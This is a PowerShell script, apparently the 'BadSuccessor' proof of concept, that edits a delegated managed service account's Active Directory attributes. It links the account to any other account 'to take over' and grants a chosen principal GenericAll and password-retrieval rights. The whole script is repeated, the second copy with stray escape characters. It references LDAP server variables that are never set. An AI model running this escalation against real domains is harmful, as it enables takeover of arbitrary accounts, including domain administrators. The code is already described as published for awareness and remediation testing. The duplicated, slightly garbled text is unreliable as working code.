zjorz/Bad-Successor-WRITE-DATA.ps1

## Bad-Successor-WRITE-DATA.ps1
# ===================================================================================================================
# WRITE DATA INTO ATTRIBUTES "msDS-groupMSAMembership", "msDS-DelegatedMSAState", "msDS-ManagedAccountPrecededByLink"
# ===================================================================================================================
#
# SOURCE: https://gist.github.com/zjorz/7999a964dfc4d5c1a691ea0c2739039e
#
<#
MIT License

Copyright (c) 2025 Semperis Technologies Inc. All rights reserved.

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

DISCLAIMER: This project is licensed under the terms of the MIT license, and
is provided for educational and informational purposes only. It is intended
to promote awareness and responsible remediation of security vulnerabilities
that may exist on systems you own or are authorized to test. Unauthorized use
of this information for malicious purposes, exploitation, or unlawful access
is strictly prohibited. Semperis does not endorse or condone any illegal
activity and disclaims any liability arising from misuse of the material.
Additionally, Semperis does not guarantee the accuracy or completeness of the
content and assumes no liability for any damages resulting from its use.
#>

# The DN Of The dMSA To Target
$dMSADN = "<DN Of The dMSA To Target>"

# 0 = UnUsed => To Remove (Not Replace!) $accAllowGetPwd Specified Value From "msDS-groupMSAMembership"
# 2 = Migration Completed => To Add (Not Replace!) $accAllowGetPwd Specified Value To "msDS-groupMSAMembership"
# 3 = Native Use => To Add (Not Replace!) $accAllowGetPwd Specified Value To "msDS-groupMSAMembership"
$dMSAState = <Numeric Value For The State>

# The DN Of ANY user/computer/sMDS/gMSA/dMSA Account To Over (When Using $dMSAState = 2)
# The Word CLEAR As A Value To Remove Any Specified DN (When Using $dMSAState = 0)
# $null As A Value To NOT Do Anything With It (When Using $dMSAState = 3)
$accDN = "<The DN Of ANY user/computer/sMDS/gMSA/dMSA Account To Take Over OR The Word CLEAR>"

# The Principal Name Of An Account To Add To (When State Is 2 Or 3) Or Remove From (When State Is 0) "msDS-groupMSAMembership" (a.k.a. PrincipalsAllowedToRetrieveManagedPassword)
$accAllowGetPwd = "<NetBIOS Domain Name>\<sAMAccountName>"

Invoke-Command -ArgumentList $dMSADN,$dMSAState,$accDN,$accAllowGetPwd -ScriptBlock {
	Param (
		$dMSADN,
		$dMSAState,
		$accDN,
		$accAllowGetPwd
	)

	Clear-Host

	$thisADDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain()
	$rwdcPDCFQDN = $thisADDomain.PdcRoleOwner.Name

	Add-Type -AssemblyName System.DirectoryServices.Protocols -ErrorAction Stop

	[Timespan]$requestTimeout = (New-Object System.TimeSpan(0,0,120)) # Default: 120 seconds
	$ldapDirectoryID = New-Object -TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList $ldapServerFQDN, $ldapServerPort, $true, $false
	$ldapAuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate
	$ldapConnection = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $ldapDirectoryID, $null, $ldapAuthType
	$ldapConnection.SessionOptions.Sealing = $true
	$ldapConnection.SessionOptions.Signing = $true

	[System.DirectoryServices.Protocols.ModifyRequest]$ldapModRequest = New-Object System.DirectoryServices.Protocols.ModifyRequest
	$permissiveModifyRqc = New-Object System.DirectoryServices.Protocols.PermissiveModifyControl
	$permissiveModifyRqc.IsCritical = $false
	[void]($ldapModRequest.Controls.Add($permissiveModifyRqc))

	$object = [PSCustomObject]@{
		distinguishedName = $dMSADN
	}

	If (-not [string]::IsNullOrEmpty($dMSAState)) {
		Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-DelegatedMSAState" -Value $dMSAState
	}
	If (-not [string]::IsNullOrEmpty($accDN)) {
		Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-ManagedAccountPrecededByLink" -Value $accDN
	}
	If (-not [string]::IsNullOrEmpty($accAllowGetPwd)) {
		$ldapSearchRequest = New-Object System.DirectoryServices.Protocols.SearchRequest
		$ldapSearchRequest.DistinguishedName = $dMSADN
		$ldapSearchRequest.Scope = [System.DirectoryServices.Protocols.SearchScope]::"Base"
		$securityMasks = [System.DirectoryServices.Protocols.SecurityMasks]'Owner' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Group' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Dacl' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Sacl'
		$sdFlagLdapControl = New-Object System.DirectoryServices.Protocols.SecurityDescriptorFlagControl($securityMasks)
		[void]($ldapSearchRequest.Controls.Add($sdFlagLdapControl))
		[void]($ldapSearchRequest.Attributes.Add("distinguishedName"))
		[void]($ldapSearchRequest.Attributes.Add("msDS-groupMSAMembership"))
		[System.DirectoryServices.Protocols.SearchResponse]$ldapSearchResponse = $ldapConnection.SendRequest($ldapSearchRequest, $requestTimeout)
		$adSecurity = New-Object System.DirectoryServices.ActiveDirectorySecurity
		If (-not [string]::IsNullOrEmpty($ldapSearchResponse.Entries.Attributes."msds-groupmsamembership")) {
			$adSecurity.SetSecurityDescriptorBinaryForm($ldapSearchResponse.Entries.Attributes.'msds-groupmsamembership'[0])
		} Else {
			$securityPrincipalOwnerSid = "S-1-5-32-544" # BUILTIN\Administrators
			$securityPrincipalOwnerSidObject = New-Object System.Security.Principal.SecurityIdentifier($securityPrincipalOwnerSid)
			$securityPrincipalOwner = ($securityPrincipalOwnerSidObject.Translate([System.Security.Principal.NTAccount])).Value
			$securityPrincipalObjectForOwner = New-Object -TypeName System.Security.Principal.NTAccount($securityPrincipalOwner)
			$adSecurity.SetOwner($securityPrincipalObjectForOwner)
		}
		$securityPrincipalNTAccount = New-Object -TypeName System.Security.Principal.NTAccount($accAllowGetPwd)
		$accessControlType = [System.Security.AccessControl.AccessControlType]::"Allow"
		If ($dMSAState -eq 0 -And -not [string]::IsNullOrEmpty($($adSecurity.Access | Where-Object {$_.IdentityReference.Value -eq $accAllowGetPwd}))) {
			$adSecurity.RemoveAccess($securityPrincipalNTAccount, $accessControlType)
		}
		If ($dMSAState -eq 2 -Or $dMSAState -eq 3) {
			$adRight = [System.DirectoryServices.ActiveDirectoryRights]::"GenericAll"
			$adSecurityInheritanceScope = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::"None"
			$aceDefinition = $securityPrincipalNTAccount,$adRight,$accessControlType,"00000000-0000-0000-0000-000000000000",$adSecurityInheritanceScope,"00000000-0000-0000-0000-000000000000"
			$accessRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($aceDefinition)
			$adSecurity.AddAccessRule($accessRule)
		}
		Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-groupMSAMembership" -Value $adSecurity
	}

	$ldapModRequest.DistinguishedName = $object.DistinguishedName
	ForEach($property in (Get-Member -InputObject $object -MemberType NoteProperty)) {
		If ($property.Name -eq "distinguishedName") {continue}

		[System.DirectoryServices.Protocols.DirectoryAttribute]$propertyMod = New-Object System.DirectoryServices.Protocols.DirectoryAttributeModification
		$propertyMod.Name = $property.Name

		If ($property.Name -eq "msDS-groupMSAMembership") {
			$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Replace
			$propertyValue = $($object.($property.Name)).GetSecurityDescriptorBinaryForm()
			$propertyMod.Add([byte[]]$propertyValue) | Out-Null
		} Else {
			If ([string]::IsNullOrEmpty($object.($property.Name)) -Or $object.($property.Name) -eq "CLEAR") {
				$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Delete
			} Else {
				$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Replace
				$propertyValue = $object.($property.Name)
				$propertyMod.AddRange([string[]]($propertyValue))
			}
		}
		[void]($ldapModRequest.Modifications.Add($propertyMod))
	}

	$ldapConnection = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $ldapDirectoryID, $null, $ldapAuthType
	$ldapConnection.SessionOptions.Sealing = $true
	$ldapConnection.SessionOptions.Signing = $true
	Try {
		Write-Host " > Updating Object '$($object.DistinguishedName)'..." -ForegroundColor Yellow

		ForEach($property in (Get-Member -InputObject $object -MemberType NoteProperty)) {
			If ($property.Name -eq "distinguishedName") {continue}

			Write-Host "   # Attribute...............: '$($property.Name)'" -ForegroundColor Yellow

			If ($property.Name -eq "msDS-groupMSAMembership") {
				$object.$($property.Name).Access | ForEach-Object {
					Write-Host "     * Value.................: '$($_.IdentityReference.Value)'" -ForegroundColor Yellow
				}
			} Else {
				Write-Host "     * Value.................: '$($object.($property.Name))'" -ForegroundColor Yellow
			}
			Write-Host ""
		}
		[void]($ldapConnection.SendRequest($ldapModRequest, $requestTimeout) -as [System.DirectoryServices.Protocols.ModifyResponse])
		Write-Host " - SUCCESS" -ForegroundColor Green
	} Catch {
		Write-Host " - FAILED" -ForegroundColor Red
		Write-Host "   Exception Type......: $($_.Exception.GetType().FullName)" -ForegroundColor Red
		Write-Host "   Exception Message...: $($_.Exception.Message)" -ForegroundColor Red
	}
	Write-Host ""
}
	# ===================================================================================================================
	# WRITE DATA INTO ATTRIBUTES "msDS-groupMSAMembership", "msDS-DelegatedMSAState", "msDS-ManagedAccountPrecededByLink"
	# ===================================================================================================================
	#
	# SOURCE: https://gist.github.com/zjorz/7999a964dfc4d5c1a691ea0c2739039e
	#
	<#
	MIT License

	Copyright (c) 2025 Semperis Technologies Inc. All rights reserved.

	Permission is hereby granted, free of charge, to any person obtaining a copy
	of this software and associated documentation files (the "Software"), to deal
	in the Software without restriction, including without limitation the rights
	to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	copies of the Software, and to permit persons to whom the Software is
	furnished to do so, subject to the following conditions:

	The above copyright notice and this permission notice shall be included in all
	copies or substantial portions of the Software.

	THE SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
	AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
	OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
	SOFTWARE.

	DISCLAIMER: This project is licensed under the terms of the MIT license, and
	is provided for educational and informational purposes only. It is intended
	to promote awareness and responsible remediation of security vulnerabilities
	that may exist on systems you own or are authorized to test. Unauthorized use
	of this information for malicious purposes, exploitation, or unlawful access
	is strictly prohibited. Semperis does not endorse or condone any illegal
	activity and disclaims any liability arising from misuse of the material.
	Additionally, Semperis does not guarantee the accuracy or completeness of the
	content and assumes no liability for any damages resulting from its use.
	#>

	# The DN Of The dMSA To Target
	$dMSADN = "<DN Of The dMSA To Target>"

	# 0 = UnUsed => To Remove (Not Replace!) $accAllowGetPwd Specified Value From "msDS-groupMSAMembership"
	# 2 = Migration Completed => To Add (Not Replace!) $accAllowGetPwd Specified Value To "msDS-groupMSAMembership"
	# 3 = Native Use => To Add (Not Replace!) $accAllowGetPwd Specified Value To "msDS-groupMSAMembership"
	$dMSAState = <Numeric Value For The State>

	# The DN Of ANY user/computer/sMDS/gMSA/dMSA Account To Over (When Using $dMSAState = 2)
	# The Word CLEAR As A Value To Remove Any Specified DN (When Using $dMSAState = 0)
	# $null As A Value To NOT Do Anything With It (When Using $dMSAState = 3)
	$accDN = "<The DN Of ANY user/computer/sMDS/gMSA/dMSA Account To Take Over OR The Word CLEAR>"

	# The Principal Name Of An Account To Add To (When State Is 2 Or 3) Or Remove From (When State Is 0) "msDS-groupMSAMembership" (a.k.a. PrincipalsAllowedToRetrieveManagedPassword)
	$accAllowGetPwd = "<NetBIOS Domain Name>\<sAMAccountName>"

	Invoke-Command -ArgumentList $dMSADN,$dMSAState,$accDN,$accAllowGetPwd -ScriptBlock {
	Param (
	$dMSADN,
	$dMSAState,
	$accDN,
	$accAllowGetPwd
	)

	Clear-Host

	$thisADDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetComputerDomain()
	$rwdcPDCFQDN = $thisADDomain.PdcRoleOwner.Name

	Add-Type -AssemblyName System.DirectoryServices.Protocols -ErrorAction Stop

	[Timespan]$requestTimeout = (New-Object System.TimeSpan(0,0,120)) # Default: 120 seconds
	$ldapDirectoryID = New-Object -TypeName System.DirectoryServices.Protocols.LdapDirectoryIdentifier -ArgumentList $ldapServerFQDN, $ldapServerPort, $true, $false
	$ldapAuthType = [System.DirectoryServices.Protocols.AuthType]::Negotiate
	$ldapConnection = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $ldapDirectoryID, $null, $ldapAuthType
	$ldapConnection.SessionOptions.Sealing = $true
	$ldapConnection.SessionOptions.Signing = $true

	[System.DirectoryServices.Protocols.ModifyRequest]$ldapModRequest = New-Object System.DirectoryServices.Protocols.ModifyRequest
	$permissiveModifyRqc = New-Object System.DirectoryServices.Protocols.PermissiveModifyControl
	$permissiveModifyRqc.IsCritical = $false
	[void]($ldapModRequest.Controls.Add($permissiveModifyRqc))

	$object = [PSCustomObject]@{
	distinguishedName = $dMSADN
	}

	If (-not [string]::IsNullOrEmpty($dMSAState)) {
	Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-DelegatedMSAState" -Value $dMSAState
	}
	If (-not [string]::IsNullOrEmpty($accDN)) {
	Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-ManagedAccountPrecededByLink" -Value $accDN
	}
	If (-not [string]::IsNullOrEmpty($accAllowGetPwd)) {
	$ldapSearchRequest = New-Object System.DirectoryServices.Protocols.SearchRequest
	$ldapSearchRequest.DistinguishedName = $dMSADN
	$ldapSearchRequest.Scope = [System.DirectoryServices.Protocols.SearchScope]::"Base"
	$securityMasks = [System.DirectoryServices.Protocols.SecurityMasks]'Owner' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Group' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Dacl' -bor [System.DirectoryServices.Protocols.SecurityMasks]'Sacl'
	$sdFlagLdapControl = New-Object System.DirectoryServices.Protocols.SecurityDescriptorFlagControl($securityMasks)
	[void]($ldapSearchRequest.Controls.Add($sdFlagLdapControl))
	[void]($ldapSearchRequest.Attributes.Add("distinguishedName"))
	[void]($ldapSearchRequest.Attributes.Add("msDS-groupMSAMembership"))
	[System.DirectoryServices.Protocols.SearchResponse]$ldapSearchResponse = $ldapConnection.SendRequest($ldapSearchRequest, $requestTimeout)
	$adSecurity = New-Object System.DirectoryServices.ActiveDirectorySecurity
	If (-not [string]::IsNullOrEmpty($ldapSearchResponse.Entries.Attributes."msds-groupmsamembership")) {
	$adSecurity.SetSecurityDescriptorBinaryForm($ldapSearchResponse.Entries.Attributes.'msds-groupmsamembership'[0])
	} Else {
	$securityPrincipalOwnerSid = "S-1-5-32-544" # BUILTIN\Administrators
	$securityPrincipalOwnerSidObject = New-Object System.Security.Principal.SecurityIdentifier($securityPrincipalOwnerSid)
	$securityPrincipalOwner = ($securityPrincipalOwnerSidObject.Translate([System.Security.Principal.NTAccount])).Value
	$securityPrincipalObjectForOwner = New-Object -TypeName System.Security.Principal.NTAccount($securityPrincipalOwner)
	$adSecurity.SetOwner($securityPrincipalObjectForOwner)
	}
	$securityPrincipalNTAccount = New-Object -TypeName System.Security.Principal.NTAccount($accAllowGetPwd)
	$accessControlType = [System.Security.AccessControl.AccessControlType]::"Allow"
	If ($dMSAState -eq 0 -And -not [string]::IsNullOrEmpty($($adSecurity.Access \| Where-Object {$_.IdentityReference.Value -eq $accAllowGetPwd}))) {
	$adSecurity.RemoveAccess($securityPrincipalNTAccount, $accessControlType)
	}
	If ($dMSAState -eq 2 -Or $dMSAState -eq 3) {
	$adRight = [System.DirectoryServices.ActiveDirectoryRights]::"GenericAll"
	$adSecurityInheritanceScope = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::"None"
	$aceDefinition = $securityPrincipalNTAccount,$adRight,$accessControlType,"00000000-0000-0000-0000-000000000000",$adSecurityInheritanceScope,"00000000-0000-0000-0000-000000000000"
	$accessRule = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($aceDefinition)
	$adSecurity.AddAccessRule($accessRule)
	}
	Add-Member -InputObject $object -MemberType NoteProperty -Name "msDS-groupMSAMembership" -Value $adSecurity
	}

	$ldapModRequest.DistinguishedName = $object.DistinguishedName
	ForEach($property in (Get-Member -InputObject $object -MemberType NoteProperty)) {
	If ($property.Name -eq "distinguishedName") {continue}

	[System.DirectoryServices.Protocols.DirectoryAttribute]$propertyMod = New-Object System.DirectoryServices.Protocols.DirectoryAttributeModification
	$propertyMod.Name = $property.Name

	If ($property.Name -eq "msDS-groupMSAMembership") {
	$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Replace
	$propertyValue = $($object.($property.Name)).GetSecurityDescriptorBinaryForm()
	$propertyMod.Add([byte[]]$propertyValue) \| Out-Null
	} Else {
	If ([string]::IsNullOrEmpty($object.($property.Name)) -Or $object.($property.Name) -eq "CLEAR") {
	$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Delete
	} Else {
	$propertyMod.Operation = [System.DirectoryServices.Protocols.DirectoryAttributeOperation]::Replace
	$propertyValue = $object.($property.Name)
	$propertyMod.AddRange([string[]]($propertyValue))
	}
	}
	[void]($ldapModRequest.Modifications.Add($propertyMod))
	}

	$ldapConnection = New-Object -TypeName System.DirectoryServices.Protocols.LdapConnection -ArgumentList $ldapDirectoryID, $null, $ldapAuthType
	$ldapConnection.SessionOptions.Sealing = $true
	$ldapConnection.SessionOptions.Signing = $true
	Try {
	Write-Host " > Updating Object '$($object.DistinguishedName)'..." -ForegroundColor Yellow

	ForEach($property in (Get-Member -InputObject $object -MemberType NoteProperty)) {
	If ($property.Name -eq "distinguishedName") {continue}

	Write-Host " # Attribute...............: '$($property.Name)'" -ForegroundColor Yellow

	If ($property.Name -eq "msDS-groupMSAMembership") {
	$object.$($property.Name).Access \| ForEach-Object {
	Write-Host " * Value.................: '$($_.IdentityReference.Value)'" -ForegroundColor Yellow
	}
	} Else {
	Write-Host " * Value.................: '$($object.($property.Name))'" -ForegroundColor Yellow
	}
	Write-Host ""
	}
	[void]($ldapConnection.SendRequest($ldapModRequest, $requestTimeout) -as [System.DirectoryServices.Protocols.ModifyResponse])
	Write-Host " - SUCCESS" -ForegroundColor Green
	} Catch {
	Write-Host " - FAILED" -ForegroundColor Red
	Write-Host " Exception Type......: $($_.Exception.GetType().FullName)" -ForegroundColor Red
	Write-Host " Exception Message...: $($_.Exception.Message)" -ForegroundColor Red
	}
	Write-Host ""
	}
No results found